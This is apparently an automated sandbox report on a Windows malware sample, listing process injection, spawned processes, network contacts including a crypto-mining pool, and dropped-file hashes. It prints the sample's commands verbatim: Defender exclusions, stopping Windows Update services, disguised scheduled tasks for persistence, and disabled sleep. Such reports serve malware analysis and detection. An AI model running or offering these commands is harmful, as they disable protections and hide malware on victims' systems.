PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1736 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4148 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4148 wrote to memory of 420 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 764 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 1968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 1968 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 420 wrote to memory of 4804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe

"C:\Users\Admin\AppData\Local\Temp\5b062ad0d2fa22af5dbee5d5f35b469b880d6d39fb90a3b08044b490eeac207d.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 288

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcfdb69758,0x7ffcfdb69768,0x7ffcfdb69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=16179 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data0RBMC" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1248 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1544 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=16179 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1836 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2176 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2440 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3028 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3204 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=16179 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3336 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2544 --field-trial-handle=1332,i,11278361648754438957,2436689740279264625,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3bc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#yyfbtmprllefmzto#> powershell <#yyfbtmprllefmzto#> -Verb <#yyfbtmprllefmzto#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:59 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:59 /f /tn WindowsSecurityUpdate_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 11.248.250.209.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 154.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 22.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 162.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.22:443 i.ytimg.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.250.179.138:443 jnn-pa.googleapis.com tcp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
NL 142.250.179.138:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
N/A 127.0.0.1:16179 tcp
N/A 127.0.0.1:16179 tcp
N/A 127.0.0.1:16179 tcp
N/A 127.0.0.1:16179 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:80 pastebin.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/1664-121-0x0000000002620000-0x0000000002720000-memory.dmp

memory/1664-122-0x0000000002550000-0x000000000258F000-memory.dmp

memory/1664-123-0x0000000006830000-0x0000000006868000-memory.dmp

memory/1664-124-0x0000000000400000-0x0000000002308000-memory.dmp

memory/1664-125-0x00000000068E0000-0x00000000068F0000-memory.dmp

memory/1664-126-0x00000000068F0000-0x0000000006DEE000-memory.dmp

memory/1664-127-0x00000000068B0000-0x00000000068E4000-memory.dmp

memory/1664-128-0x0000000073890000-0x0000000073F7E000-memory.dmp

memory/1664-129-0x0000000004190000-0x0000000004196000-memory.dmp

memory/1664-130-0x000000000C320000-0x000000000C926000-memory.dmp

memory/1664-131-0x000000000C9B0000-0x000000000CABA000-memory.dmp

memory/1664-133-0x00000000068E0000-0x00000000068F0000-memory.dmp

memory/1664-132-0x000000000CAF0000-0x000000000CB02000-memory.dmp

memory/1664-134-0x000000000CB10000-0x000000000CB4E000-memory.dmp

memory/1664-135-0x000000000CBB0000-0x000000000CBFB000-memory.dmp

memory/1664-136-0x0000000002620000-0x0000000002720000-memory.dmp

memory/1664-137-0x0000000002550000-0x000000000258F000-memory.dmp

memory/1664-138-0x0000000000400000-0x0000000002308000-memory.dmp

memory/1664-139-0x000000000CDF0000-0x000000000CE66000-memory.dmp

memory/1664-141-0x000000000CE70000-0x000000000CF02000-memory.dmp

memory/1664-142-0x000000000CF10000-0x000000000CF76000-memory.dmp

memory/1664-143-0x00000000068E0000-0x00000000068F0000-memory.dmp

memory/1664-144-0x0000000073890000-0x0000000073F7E000-memory.dmp

memory/1664-146-0x000000000E510000-0x000000000E6D2000-memory.dmp

memory/1664-145-0x00000000068E0000-0x00000000068F0000-memory.dmp

memory/1664-147-0x000000000E6E0000-0x000000000EC0C000-memory.dmp

memory/1664-148-0x00000000040E0000-0x0000000004130000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1736-160-0x0000000000D10000-0x0000000000F9B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/5080-171-0x0000000000400000-0x0000000000527000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2820-172-0x00007FF693AC0000-0x00007FF694CE6000-memory.dmp

memory/2820-174-0x00007FF693AC0000-0x00007FF694CE6000-memory.dmp

memory/4148-181-0x0000000000360000-0x0000000000994000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2820-184-0x00007FFD09C50000-0x00007FFD09E2B000-memory.dmp

memory/4148-185-0x0000000001340000-0x00000000013B0000-memory.dmp

memory/4148-187-0x00000000778F4000-0x00000000778F5000-memory.dmp

memory/5080-188-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/5080-190-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/5080-193-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/5080-192-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/1664-180-0x0000000000400000-0x0000000002308000-memory.dmp

memory/1736-191-0x0000000000D10000-0x0000000000F9B000-memory.dmp

memory/5080-186-0x0000000000400000-0x0000000000527000-memory.dmp

memory/5080-197-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/4148-195-0x0000000073890000-0x0000000073F7E000-memory.dmp

memory/5080-201-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/2820-196-0x00007FF693AC0000-0x00007FF694CE6000-memory.dmp

memory/5080-206-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

memory/5080-204-0x00000000FFBD0000-0x00000000FFBE0000-memory.dmp

